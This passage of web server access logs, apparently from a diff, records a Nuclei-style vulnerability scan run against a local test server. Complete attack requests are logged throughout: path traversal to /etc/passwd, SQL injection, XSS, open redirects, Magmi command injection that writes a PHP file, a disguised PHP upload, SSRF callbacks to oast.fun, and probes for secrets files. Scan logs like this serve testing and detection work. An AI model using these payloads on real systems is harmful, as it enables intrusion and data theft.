+0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=\x5C\x5C\x5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://c9v8h88smpv8c1ig07h0nu3e3y1dka1jz.oast.fun\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/c9v8h8gsmpv8c1qg07h0qnqtqkcopijtx.oast.fun/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A297MTlokSjORVTUjqtfLBvyKSUI\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@297MTlokSjORVTUjqtfLBvyKSUI.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/logs/laravel.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_dashboards/app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mstore-api/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db 